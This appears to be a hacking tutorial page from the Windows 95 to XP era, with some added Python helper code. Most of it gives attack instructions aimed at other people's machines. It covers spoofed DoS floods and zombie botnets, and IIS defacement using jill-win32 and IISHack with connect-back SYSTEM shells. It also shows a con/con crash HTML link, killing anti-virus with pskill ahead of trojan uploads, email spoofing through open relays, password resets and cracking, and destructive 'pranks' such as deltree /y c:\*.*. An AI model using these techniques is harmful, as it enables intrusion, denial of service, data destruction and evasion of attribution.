Nuking dates from the Windows 95/NT4 days. The original WinNuke was written for Windows 95; it hit port 139 (Win95) and port 135 (WinNT) with malformed out-of-band data. Some people still run Windows 95 and NT4, but not many. If you happen to find one, use Superkod; I found it works best. Open the program, type in the IP and click NUKE. If the target runs Win95 or WinNT4 and is unpatched, its internet connection will be dropped or it will get a BSOD.
That is all very well, but a program like KOD does not hide your IP from the target. If they run a firewall, they will see where all this traffic is coming from, and they will see that it is YOU. So you need to spoof your IP address so the target cannot see who the attack is coming from. For Win2k/XP targets I would recommend Smurf2k, Nemesy or Jolt (Jolt was designed for attacking Win2k), but beware: Jolt does not spoof the IP, only Smurf2k and Nemesy do. Smurf2k works from a broadcast list. It sends echo requests to those broadcast addresses with the target's address forged as the source, so every host on those networks replies to the target, and what the target sees is traffic arriving from the amplifier networks, not from you. Keep in mind that spoofing only works for traffic that needs no reply (ICMP, UDP and SYN floods); anything that needs a completed TCP connection cannot be spoofed, because the replies go to the forged address instead of to you.

Before you attack someone, find out what connection they have, because if you want to overwhelm them with bandwidth you need more than they have. A modem user with no firewall you can disconnect on your own. Someone with more bandwidth than you, a firewall, or a patched system needs BANDWIDTH to disconnect, so gather a few of your buddies, give them a DoS tool and all attack at the same time. Make sure you run a firewall that blocks incoming IGMP, ICMP, UDP and TCP connections in case they start attacking back. Even better, infect a few hosts on ADSL or corporate lines with a lot of bandwidth, and you have more bandwidth at your disposal than any single line could give you.
This is where zombies come in. You infect a few hosts (zombies) and control them to run a DoS attack on someone. It works much like a trojan: you infect their PC and take control of it.
Try Freak88; it lets you control several PCs at the same time and run a DoS attack from all of them.
(7) Getting a PC name, MAC address and the user name logged on
So you would like to know someone's PC name, the MAC address of their network card, or the user name currently logged on to the PC? This information can be very useful. The PC name is often the person's own name or their company name. The MAC address is the hardware address burned into the network card; it normally stays the same, although most drivers let you override it, so treat it as a strong hint rather than proof. The user name can be useful if you want to know the person's real name. You can only get this remotely if the PC has NetBIOS over TCP/IP enabled and UDP port 137 is reachable, which is why it works on a LAN or against an unfirewalled host and fails as soon as a firewall drops NetBIOS traffic.
In a DOS prompt (Start, Run, cmd) type: nbtstat -a IP
Example: nbtstat -a 196.35.24.15. It will show something like this:
    Local Area Connection 3:
    Node IpAddress: [10.10.10.22] Scope Id: []

               NetBIOS Remote Machine Name Table

           Name               Type         Status
        ---------------------------------------------
        PCNAME         <00>  UNIQUE      Registered
        DOMAINNAME     <00>  GROUP       Registered
        PCNAME         <03>  UNIQUE      Registered
        PCNAME         <20>  UNIQUE      Registered
        DOMAINNAME     <1E>  GROUP       Registered
        USERNAME       <03>  UNIQUE      Registered

        MAC Address = 00-22-AE-43-33-30
It shows the PC name, the domain or workgroup if the PC belongs to one, and the user name logged on to the PC. Read the table by suffix: <00> UNIQUE is the computer name, <00> GROUP is the domain or workgroup, <20> UNIQUE means the file server service is running (so shares are offered), <1E> GROUP is the browser election group, and <03> UNIQUE is the messenger service, which is registered once for the computer and once for each logged-on user, so the <03> name that is not the computer name is the user. The Node IpAddress line at the top is your own interface, not the target's. The MAC is the card's burned-in address and normally never changes, which makes it handy for identifying someone: your buddy attacks you, you check his IP, do an nbtstat on it and get his MAC; later, if you check his PC and see the same MAC, you know it was him. Two caveats: a dial-up host has no Ethernet card on that interface and reports 00-00-00-00-00-00, and a MAC can be changed in the driver settings, so it is evidence, not proof.
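As an added example (not code from the original page), here is a small Python parser for the nbtstat -a listing above. The sample text is constructed from that listing, not a real capture. It picks out the computer name, domain or workgroup, logged-on users and MAC by suffix, and treats the all-zero MAC a dial-up host reports as unknown.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Standard NetBIOS name suffixes as nbtstat prints them: (suffix, type).
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "workstation/computer name",
    ("00", "GROUP"): "domain or workgroup",
    ("03", "UNIQUE"): "messenger service (computer, or a logged-on user)",
    ("20", "UNIQUE"): "file server service (shares are offered)",
    ("1B", "UNIQUE"): "domain master browser",
    ("1D", "UNIQUE"): "master browser",
    ("1E", "GROUP"): "browser service elections",
}

# Constructed sample, modelled on the listing in the text (not a real capture).
SAMPLE_NBTSTAT = """\
Local Area Connection 3:
Node IpAddress: [10.10.10.22] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    PCNAME         <00>  UNIQUE      Registered
    DOMAINNAME     <00>  GROUP       Registered
    PCNAME         <03>  UNIQUE      Registered
    PCNAME         <20>  UNIQUE      Registered
    DOMAINNAME     <1E>  GROUP       Registered
    USERNAME       <03>  UNIQUE      Registered

    MAC Address = 00-22-AE-43-33-30
"""

_ENTRY = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)", re.M)
_MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")


@dataclass
class NbtInfo:
    computer: Optional[str] = None
    domain: Optional[str] = None
    users: List[str] = field(default_factory=list)
    mac: Optional[str] = None          # None when absent or all zeros (dial-up)
    entries: List[Tuple[str, str, str, str, str]] = field(default_factory=list)


def parse_nbtstat(text: str) -> NbtInfo:
    info = NbtInfo()
    for name, suffix, kind, status in _ENTRY.findall(text):
        suffix = suffix.upper()
        meaning = SUFFIX_MEANING.get((suffix, kind), "unknown")
        info.entries.append((name, suffix, kind, status, meaning))
    # <00> UNIQUE is the computer, <00> GROUP its domain or workgroup.
    for name, suffix, kind, _, _ in info.entries:
        if suffix == "00" and kind == "UNIQUE" and info.computer is None:
            info.computer = name
        elif suffix == "00" and kind == "GROUP" and info.domain is None:
            info.domain = name
    # Every <03> UNIQUE name that is not the computer itself is a logged-on user.
    info.users = [n for n, s, k, _, _ in info.entries
                  if s == "03" and k == "UNIQUE" and n != info.computer]
    m = _MAC.search(text)
    if m and m.group(1).upper() != "00-00-00-00-00-00":
        info.mac = m.group(1).upper()
    return info


if __name__ == "__main__":
    r = parse_nbtstat(SAMPLE_NBTSTAT)
    print(f"computer={r.computer} domain={r.domain} users={r.users} mac={r.mac}")
    for e in r.entries:
        print("  %-15s <%s> %-6s %-10s %s" % e)
```

To use it on a live host, pipe the real output in: `nbtstat -a 196.35.24.15 > out.txt`, then call `parse_nbtstat(open("out.txt").read())`. If the host is firewalled, nbtstat prints "Host not found" and the parser returns an empty NbtInfo.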
(8) IP addresses, understanding them
Everyone who connects to a network has an IP address. An IP address looks something like this: 80.65.123.25
Your network card has an IP address and your modem gets one when you connect to the Internet, and the two are different because your LAN uses private addresses that are not routed on the Internet; the modem's address is the public one other people see. When you connect to the Internet you get either a fixed (static) IP or a dynamic one, depending on your connection. Modem users get an IP address that changes every time they reconnect, which is very useful if you attack people: disconnect and you have a different IP. With ISDN or ADSL you will often get a static IP, so you get the same address every time you connect. Attack someone without IP spoofing and they will see that it is your IP attacking them. They can then go to your ISP (internet service provider), ask who the IP belongs to, and you can get into trouble. This is where modem users are lucky: with no static IP they can go mad and attack people without being caught, well, almost... The ISP still logs which account was using a given IP at a given time and which telephone number it dialled in from, but for a simple DoS attack it is usually too much hassle for anyone to follow up.
IP spoofing is when you attack someone using a bogus source IP. Whatever the attack, the target receives packets that appear to come from addresses that either do not exist or belong to someone else, not you. The catch is that any reply goes to the spoofed address rather than to you, so spoofing only works for one-way traffic (ICMP, UDP or SYN floods); anything that needs a completed TCP connection cannot be spoofed.
Every network card has a burned-in MAC address. A MAC address looks something like this: 00-22-AE-43-33-30. It is not supposed to change, but most drivers let you override it, so it is only a strong hint. If you attack someone and they do an nbtstat on you and get the MAC of your network card, that is a simple way of identifying you as the attacker.
(9) IIS (web server/web page) hacking
IIS is Microsoft's web server. The old versions were very buggy and very exploitable, and defacing an IIS server was actually very easy: a lot of system administrators do not load patches on their IIS servers, and they are the ones who get defaced (hacked). The IIS versions I will show you how to hack are IIS 4 and 5. IIS 6 is the current version at the time of writing, but there are still a lot of IIS 4/5 servers online. IIS servers are hacked through buffer overflows and other exploits: specially crafted input is sent to the server, the server process is hijacked, and you end up with a command shell running as SYSTEM (the NT equivalent of root). In the IIS hacking download section there are a lot of IIS hacking tools that make it easy for anyone to hack an unpatched IIS server. Not all web servers run IIS; there is plenty of other web server software out there, such as Apache. We will only be dealing with IIS servers.
First you have to find an IIS server. Dreamscape IISscanner is very useful: it lets you scan a single IP or an IP range, and reports any IIS servers it finds along with the version each host is running. Another way is to telnet to the IP on port 80. In a DOS prompt (Start, Run, cmd) type: telnet 196.35.45.21 80. The screen stays blank until you send a request, because a web server says nothing on its own; type HEAD / HTTP/1.0 and press Enter twice, and the response headers come back with a Server: line such as Server: Microsoft-IIS/5.0. The banner is a hint, not proof, because an administrator can change or remove it. Web servers normally run on port 80, but it can be any other port the administrator chooses.
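The telnet banner grab above, done in Python as an added example (not code from the original page or from any of the tools it names). The sample response is constructed in the shape an IIS 5 server sends and is not a real capture; `grab_banner` is the live version and needs a network.

```python
import re
import socket
from typing import Optional, Tuple


def head_request(host: str, path: str = "/") -> bytes:
    """The request you have to type after telnet connects: the server is silent
    until it sees one. HTTP/1.0 keeps the reply short and closes the socket."""
    return f"HEAD {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def server_banner(response: bytes) -> Tuple[int, Optional[str]]:
    """Return (status code, Server header) from a raw HTTP response.
    The header is None when the administrator has removed it."""
    head = response.split(b"\r\n\r\n", 1)[0]
    lines = head.decode("latin-1").split("\r\n")
    m = re.match(r"HTTP/\d\.\d\s+(\d{3})", lines[0])
    if not m:
        raise ValueError("not an HTTP response: %r" % lines[0][:40])
    server = None
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            server = value.strip()
    return int(m.group(1)), server


def iis_version(server: Optional[str]) -> Optional[str]:
    """'5.0' for 'Microsoft-IIS/5.0', None for anything else (or a hidden banner)."""
    if not server:
        return None
    m = re.match(r"Microsoft-IIS/(\d+(?:\.\d+)?)", server, re.I)
    return m.group(1) if m else None


def grab_banner(host: str, port: int = 80, timeout: float = 5.0):
    """Live version of the telnet trick (needs network; not exercised here)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(head_request(host))
        data = b""
        while b"\r\n\r\n" not in data and len(data) < 65536:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return server_banner(data)


# Constructed sample of the shape an IIS 5 server sends (not a real capture).
SAMPLE_IIS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"Date: Mon, 01 Jan 2001 00:00:00 GMT\r\n"
    b"Content-Length: 1433\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    code, server = server_banner(SAMPLE_IIS_RESPONSE)
    print(code, server, "IIS version:", iis_version(server))
```

Because the Server header is just text the administrator controls, a missing or odd banner tells you nothing either way; the scanner tools the page mentions do the same thing and share the same limitation.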
If you find a IIS server, it's time to DEFACE it

Go check my IIS hacking page for IIS hacking programs. We will use Jill-win32 first. It exploits the IIS 5 .printer (Internet Printing ISAPI extension) overflow. In a DOS prompt (Start, Run) run jill-win32. It will show you this:
    iis5 remote .printer overflow.
    dark spyrit <dspyrit@beavuh.org> / beavuh labs.

    usage: jill-win32 <victimHost> <victimPort> <attackerHost> <attackerPort>
An example of how to use it:
    jill-win32 196.65.56.32 80 196.89.65.45 69
Here 196.65.56.32 is the IIS server you want to deface, port 80 is the port its IIS service runs on, 196.89.65.45 is your IP, and port 69 is the port that TFTPD32 (available from this zip file) will listen on. When you run jill-win32 it exploits the .printer overflow on the IIS server and leaves a backdoor shell on the server that connects back to port 69 on your PC, where TFTPD32 is listening. It is a plain connect-back shell, so any TCP listener on that port works (netcat with nc -l -p 69 is the usual choice), and the shell runs as SYSTEM because the IIS 5 .printer extension runs inside the inetinfo.exe process.
Here is another example. Download IISHack and do the following:

    Usage: IISHack1.5 [server] [server-port] [trojan-port]

    C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969
    IISHack Version 1.5
    eEye Digital Security
    http://www.eEye.com
    Code By: Ryan Permeh & Marc Maiffret
    eEye Digital Security takes no responsibility for use of this code.
    It is for educational purposes only.
    Attempting to find an executable directory...
    Trying directory [scripts]
    Executable directory found. [scripts]
    Path to executable directory is [C:\Inetpub\scripts]
    Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
    Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
    Sending the exploit...
    Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.

    C:\> telnet www.[yourowncompany].com 6969
    Trying www.[yourowncompany].com...
    Microsoft(R) Windows NT(TM)
    (C) Copyright 1985-1996 Microsoft Corp.

    C:\WINNT\system32>whoami
    NT AUTHORITY\SYSTEM
If you have no clue what is going on here, go the script kiddie way: download the GUI (graphical user interface) IIS hacking programs from my IIS page and let the program deface the web page for you. The whoami output above is the point of all this: NT AUTHORITY\SYSTEM is the highest privilege on the box, so once that shell is up you can do anything, including replacing the web pages. There are a few IIS tutorials in the Windows hacker misc section.
(10) Crashing a Win95/Win98 PC with any access to a share
Windows 95/98 does not handle the reserved DOS device name CON properly. Any Windows 95/98 PC can be crashed with this /con/con trick (Microsoft fixed it in bulletin MS00-017), but you need access to a share on the PC; any level of access will do.
Create a htm file with the following code in it :
<html>
<head><title>Crash!</title></head>
<body>
<a href="file://pcname/sharename/con/con">click me!</a>
</body>
</html>
pcname is the name of the PC you want to crash (or its IP) and sharename is the share you have access to. When you open the htm file and click on the link, the target PC crashes (BSOD). The other device names (aux, nul, prn, com1 and so on) work the same way; con/con is just the best known.
(11) Creating undeletable directories remotely
Now this is something that can really create havoc! I tested it on Win9X and Win NT4. It does not work on Win2k or Win XP. Beware, do not try this on yourself! Windows 9x and NT 4 have a flaw that lets a remote connection create practically undeletable files and directories anywhere on the remote machine. They can be deleted, but it takes a couple of minutes of fiddling with DOS commands. Download NetBiosBomber, choose the target, choose which OS, and you are ready to make someone's life hell. Remember, if their system is up to date it will not work.
(12) Connecting to mIRC through a Wingate
A Wingate is a proxy server: anyone can connect to it (some require a username and password) and then work through it to reach some other server, so it looks as if you are coming from the proxy and your identity is hidden. mIRC is an internet relay chat client, a chat room client. Download mIRC now! mIRC has a firewall option, and that is where you specify your Wingate. Tick "use firewall", make sure it is set to SOCKS4, and put the Wingate address in "hostname". The port should be 1080, with no username or password. Wingate lists are available from Cyberarmy, or you can use any port scanner, or Proxy finder, to search a subnet for SOCKS Wingates: scan an IP range for hosts with port 1080 open. Wingates are great for keeping you anonymous on IRC, with two caveats: the proxy owner sees, and may log, everything you send through it, and most IRC networks scan connecting clients for open proxies on port 1080 and ban the ones they find.
(13) Anonymous email / email as any address
Download RA-Anonymous email first. Then choose who you want to send to and who you want the email to appear to be from. For this to work you need an SMTP server that accepts relaying. So in the server box put: "smtp.mweb.co.za" - this SMTP server worked at the time I tested it - and you are ready to send someone email from billgates@microsoft.com!

Use OPENRELAYCHECKER from my downloads page to search for email servers that allow relaying. Only misconfigured servers still relay, because an open relay lands on spam blocklists within days, and mail with a forged From: address is increasingly rejected or flagged by the receiving side through SPF, DKIM and DMARC checks on the claimed sender's domain.
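What an open-relay checker actually does, as an added Python example (not code from the page or from OPENRELAYCHECKER): it asks the server to carry a message between two domains the server does not host and looks at the reply to RCPT TO. The reply scripts are constructed, not captures from any real server; `SocketTransport` is the live version and needs a network.

```python
import socket
from typing import List, Tuple


class SocketTransport:
    """Line transport over a real TCP connection (needs network; not exercised here)."""
    def __init__(self, host: str, port: int = 25, timeout: float = 15.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.reader = self.sock.makefile("rb")

    def readline(self) -> str:
        return self.reader.readline().decode("latin-1")

    def sendline(self, line: str) -> None:
        self.sock.sendall(line.encode("ascii") + b"\r\n")


class ScriptedTransport:
    """Offline stand-in: plays back constructed server replies and records
    what the client sent, so the relay logic can run without a network."""
    def __init__(self, replies: List[str]):
        self.replies = list(replies)
        self.sent: List[str] = []

    def readline(self) -> str:
        return self.replies.pop(0) if self.replies else ""

    def sendline(self, line: str) -> None:
        self.sent.append(line)


def read_reply(t) -> int:
    """Consume one SMTP reply, including 'NNN-' continuation lines; return NNN."""
    while True:
        line = t.readline()
        if len(line) < 3:
            raise ConnectionError("connection closed mid-reply")
        if line[3:4] != "-":
            return int(line[:3])


def open_relay_test(t, helo: str = "probe.example",
                    sender: str = "relaytest@example.com",
                    rcpt: str = "relaytest@example.net") -> Tuple[str, str]:
    """Returns ('open' | 'closed' | 'error', detail). Both addresses are in
    domains the server being tested does not host (assumption of the probe)."""
    if read_reply(t) != 220:
        return "error", "no 220 greeting"
    t.sendline(f"HELO {helo}")
    if read_reply(t) != 250:
        return "error", "HELO refused"
    t.sendline(f"MAIL FROM:<{sender}>")
    code = read_reply(t)
    if code != 250:
        return "closed", f"foreign sender refused ({code})"
    t.sendline(f"RCPT TO:<{rcpt}>")
    code = read_reply(t)
    t.sendline("RSET")          # never actually hand over a message
    read_reply(t)
    t.sendline("QUIT")
    if code in (250, 251):
        return "open", f"foreign recipient accepted ({code})"
    return "closed", f"relay refused ({code})"


# Constructed reply scripts (not captures from any real server).
OPEN_RELAY_SCRIPT = [
    "220 mail.example.org ESMTP ready\r\n",
    "250 mail.example.org\r\n",
    "250 2.1.0 Ok\r\n",
    "250 2.1.5 Ok\r\n",
    "250 2.0.0 Ok\r\n",
]
CLOSED_RELAY_SCRIPT = [
    "220 mail.example.org ESMTP ready\r\n",
    "250-mail.example.org\r\n",           # multi-line reply exercises read_reply
    "250 8BITMIME\r\n",
    "250 2.1.0 Ok\r\n",
    "554 5.7.1 Relay access denied\r\n",
    "250 2.0.0 Ok\r\n",
]

if __name__ == "__main__":
    print(open_relay_test(ScriptedTransport(OPEN_RELAY_SCRIPT)))
    print(open_relay_test(ScriptedTransport(CLOSED_RELAY_SCRIPT)))
```

A 250 at RCPT TO is strong evidence but not conclusive: some servers accept the recipient and only reject at DATA, so a "closed" verdict is certain while an "open" one is worth a second look. The RSET before QUIT means nothing is ever delivered by the probe itself.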
(14) Resetting and cracking the Win2K or WinXP administrator password
Resetting a Win2K admin password is easy. Boot from a Win9X boot disk or CD, go to the Winnt\system32\config directory, find the file called "SAM", delete it and reboot. The Administrator password is now blank (no password). This only works on FAT32 partitions, because a Win9X boot disk cannot read NTFS. Note that the SAM holds every local account, so deleting it wipes the other local accounts and their passwords too.
For Windows XP you need this file, which contains a few utilities you can use to reset the XP administrator password.
There is also a program called AdminHack that takes a dictionary file and cracks the administrator account if you have local access to the PC.
(15) Connecting to mIRC/KaZaA/ICQ through a firewall that has certain ports blocked, using a SOCKS server
When you are behind a firewall and mIRC, KaZaA or ICQ is blocked, you can use a technique called HTTP tunnelling. Basically your program connects to a small program running on your own computer, and that program wraps the data in HTTP and sends it out through the web port the firewall does allow, to a tunnel endpoint on the outside that unwraps it again. Download HTTPort or Socks2HTTP; either runs a SOCKS server on your PC that you can point mIRC, KaZaA, ICQ or whatever other blocked program at. In mIRC or KaZaA go to settings and tell the program to connect to your SOCKS server: the server address is 127.0.0.1 (your own PC) and the SOCKS port is 1080.
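Both the Wingate trick in section 12 and the local SOCKS server here speak the same protocol: the client sends a SOCKS4 CONNECT request and reads an 8-byte reply. As an added example (not code from the page, mIRC, HTTPort or Socks2HTTP), here is that exchange in Python; `connect_via_socks4` is the live version and needs a network.

```python
import socket
import struct
from typing import Tuple

SOCKS_VERSION = 4
CMD_CONNECT = 1
REPLY_TEXT = {
    90: "request granted",
    91: "request rejected or failed",
    92: "rejected: proxy cannot reach the client's identd",
    93: "rejected: identd reports a different user-id",
}


def socks4_connect_request(dest_ip: str, dest_port: int, userid: str = "") -> bytes:
    """VN(1) CD(1) DSTPORT(2, big-endian) DSTIP(4) USERID NUL.
    SOCKS4 carries a raw IPv4 address, so the host name is resolved first."""
    if not 0 < dest_port < 65536:
        raise ValueError("port out of range")
    return (struct.pack("!BBH4s", SOCKS_VERSION, CMD_CONNECT, dest_port,
                        socket.inet_aton(dest_ip))
            + userid.encode("ascii") + b"\x00")


def parse_socks4_reply(reply: bytes) -> Tuple[bool, str]:
    """Reply is VN(1, always 0) CD(1) DSTPORT(2) DSTIP(4); only CD matters."""
    if len(reply) != 8 or reply[0] != 0:
        raise ValueError("malformed SOCKS4 reply: %r" % reply)
    cd = reply[1]
    return cd == 90, REPLY_TEXT.get(cd, f"unknown reply code {cd}")


def connect_via_socks4(proxy_host: str, proxy_port: int, dest_host: str,
                       dest_port: int, userid: str = "",
                       timeout: float = 10.0) -> socket.socket:
    """Open a TCP stream to dest through the proxy (needs network; not exercised
    here). Returns the connected socket, ready for the IRC/ICQ traffic."""
    dest_ip = socket.gethostbyname(dest_host)
    s = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    try:
        s.sendall(socks4_connect_request(dest_ip, dest_port, userid))
        reply = b""
        while len(reply) < 8:
            chunk = s.recv(8 - len(reply))
            if not chunk:
                raise ConnectionError("proxy closed the connection before replying")
            reply += chunk
        ok, text = parse_socks4_reply(reply)
        if not ok:
            raise ConnectionError(f"SOCKS4 {text}")
    except Exception:
        s.close()
        raise
    return s


if __name__ == "__main__":
    req = socks4_connect_request("192.0.2.10", 6667, "anon")   # constructed values
    print(req.hex())
    print(parse_socks4_reply(b"\x00\x5a\x00\x00\x00\x00\x00\x00"))
```

Two things worth noticing: the proxy sees the destination in the clear, which is why a Wingate operator can log where you went; and because SOCKS4 only carries an IPv4 address, the name lookup for the IRC server happens on your side, outside the tunnel, unless the client speaks SOCKS4a or SOCKS5.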
(16) Killing programs or processes remotely
Let's say you try to upload a trojan to someone's machine and their anti-virus picks it up. Check whether you have an account on the machine with Administrator rights. If you do, you can use PsKill to kill the anti-virus program or the firewall. You can kill basically any program or process running on the machine, but it must be a Win2k or XP machine (PsKill reaches a remote box over the admin shares, so it also needs those enabled and port 445 or 139 open). If the person runs Norton AntiVirus the process will be called something like nav32.exe, and the PsKill command is:
    pskill \\66.33.22.11 -u administrator nav32.exe
66.33.22.11 is the IP or PC name of the victim,
-u administrator is the account you have admin rights with (add -p password, or you will be prompted for it), and
nav32.exe is the program file or process you want to kill. You can even kill winlogon.exe, which will most probably blue-screen the machine, since it is a critical system process.
So now you have killed the anti-virus or firewall and you are ready to upload a trojan, keylogger or anything else you like...
(17) Getting someone's IP and doing a ping sweep
Download IPstealer from WindowsHacker, put in your IP, click Convert IP, click Listen and send your victim the link. When they open the link, their IP shows up in IPstealer.
If you need random IP addresses you can do a ping sweep: it scans a whole IP range and shows you which IPs are online. Download SuperScan, put in an IP range (Start 80.23.23.1 to Stop 80.23.23.255) and choose "ping only" under scan type. It scans the whole range and shows which IPs answered. Hosts behind a firewall that drops ICMP look offline even when they are up.
(18) Pranks to pull on someone
Here are a few things you can do to someone to annoy the living hell out of them.

1) Blue Screen Of Death: create a batch file "something.bat" containing the following (Win9X only):
    C:\Aux\Aux
or
    C:\Con\Con
Now put it in the C:\Windows\Start Menu\Programs\StartUp folder, so every time the PC boots it throws a BSOD.
2) Delete the person's whole C drive with this command: deltree /y c:\*.*
3) Take a screenshot of the person's desktop, set that picture as their background and hide the taskbar and desktop icons. On 2000 and XP, lock the PC and move the windows out of the way, and see how clever your friend really is. Or put a password on a screen saver and put the screen saver file in the startup folder; they will have to boot into safe mode to get rid of it.
4) A nice harmless trick: schedule something like a password-protected screen saver on a PC for a certain time, sure to make someone scream.
5) Go to the Windows directory and look for the file system.ini (not win.ini: the shell= line lives in the [boot] section of system.ini). Find the line shell=Explorer.exe and change it to something like shell="YOUR PC HAS A VIRUS ON IT" or shell="Bill Gates Hates You". When the PC restarts it complains that it cannot find that "program" and does not boot to the desktop at all; the fix is to boot to DOS and put shell=Explorer.exe back.
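The /con/con crash in section 10 and the Aux\Aux and Con\Con batch files in prank 1 above rely on the same rule: Win32 resolves a reserved DOS device name anywhere in a path, regardless of directory, case, extension or trailing spaces. As an added example (not code from the page), here is the check a file server or web application should run on user-supplied paths to refuse such names; the paths in the test are the ones from this page, and `CLOCK$` and the COM/LPT ranges are the other names Win32 reserves.

```python
import re
from typing import List

# Names Win32 treats as devices in any directory, with or without an extension.
_DEVICE_NAMES = ({"CON", "PRN", "AUX", "NUL", "CLOCK$"}
                 | {f"COM{i}" for i in range(1, 10)}
                 | {f"LPT{i}" for i in range(1, 10)})


def is_reserved_device(component: str) -> bool:
    """True when one path component resolves to a DOS device.
    Win32 matching is case-insensitive, ignores anything after the first
    dot, and strips trailing spaces and dots, so 'con', 'Con.txt' and
    'aux  ' all hit; 'console' and 'com10' do not."""
    base = component.rstrip(" .").split(".", 1)[0].rstrip(" ")
    return base.upper() in _DEVICE_NAMES


def reserved_components(path: str) -> List[str]:
    """Every component of a local, UNC or file:// path that names a device."""
    if path.lower().startswith("file://"):
        path = path[7:]
    return [p for p in re.split(r"[\\/]+", path) if p and is_reserved_device(p)]


def is_safe_path(path: str) -> bool:
    """What a share or web app should ask before touching a user-supplied path."""
    return not reserved_components(path)


if __name__ == "__main__":
    for p in (r"\\pcname\sharename\con\con", r"C:\Aux\Aux", r"C:\Windows\win.ini"):
        print(p, "->", reserved_components(p) or "ok")
```

Rejecting the component is the right fix rather than rejecting the literal string "con/con", because the same device is reachable as CON.TXT, "con " or through a different directory, all of which the check above catches.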

(19) Cracking a user account locally and remotely - brute force or dictionary attack - Win2K and WinXP
When you need the password of an account on your local machine or on a remote machine, you can either brute force or dictionary attack the account. Remember this can take anywhere from a minute to a few days, depending on how complex the password is. Guessing online against a remote machine is slow and noisy, and a lockout policy can freeze the account after a handful of attempts; with local admin access it is faster to dump the password hashes from the SAM and crack them offline, because the NT hash is unsalted and can be computed millions of times a second.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------